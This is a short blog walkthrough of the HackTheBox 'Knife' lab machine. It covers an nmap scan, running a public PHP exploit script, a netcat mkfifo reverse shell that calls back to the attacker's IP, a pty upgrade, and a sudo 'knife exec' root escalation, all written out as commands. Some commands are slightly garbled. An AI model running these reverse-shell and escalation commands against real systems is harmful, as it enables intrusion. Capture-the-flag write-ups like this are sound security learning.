HackTheBox : Knife Walkthrough

Step 1:

Let’s scan for open ports with Nmap

Command: nmap -A 10.10.10.242

Step 2:

I couldn’t find anything definitive from the port scan. Accordingly, let’s look at the traffic network with burp suite

Here we see the version of php. Now let’s find the appropriate exploit for this version.

Let’s look at the first

Now, let’s download this exploit and start the infiltration process.

Step 3:

Command: python3 49933.py

Good, we’re inside now.

Let’s look at who we are and all the files.

Command: whoami

Command: find

Let’s look inside this file.

Command: cat ./home/james/user.txt

Findout the user flag and submit to htb.

Get root

Let’s get in touch between the first target car and our own car

Command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your ip1234 >/tmp/f

Create an interactive terminal with python

Command: python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

Get root and find the flag

Command: sudo /usr/bin/knife exec — exec “exec ‘/bin/sh -i ’ ”

Get the root and find the flag

Findout the rootflag and submit to htb.

Good h4cks)

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Why is an experienced team of developers crucial in mobile app security?

Ubiq launches the fourth redeemable NFT

Privacy on the Internet

Student Beans ⋆ 12 Months Upgrade to Your Own Account

ShibaBNB Will be Available on CoinTiger 23 November. 7,420,000,000,000 ShibaBNB to Give Away!

No More Exploitation: Our Savior web3.0

Cloudbric Progress Report (8/29 ~ 9/11)

How To Setup TOTP Authenticator for 2-Factor Authentication (Complete Guide)

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

TryHackMe-Gotta Catch’em All!(Pokemon)- Walkthrough by Subhadip Nag(MrL0s3r)

[Day 14] Networking Dev(Insecure)Ops | Advent of Cyber 3 (2021)

TryHackMe: Mr. Robot CTF Writeup

Basic Pentesting CTF Walkthrough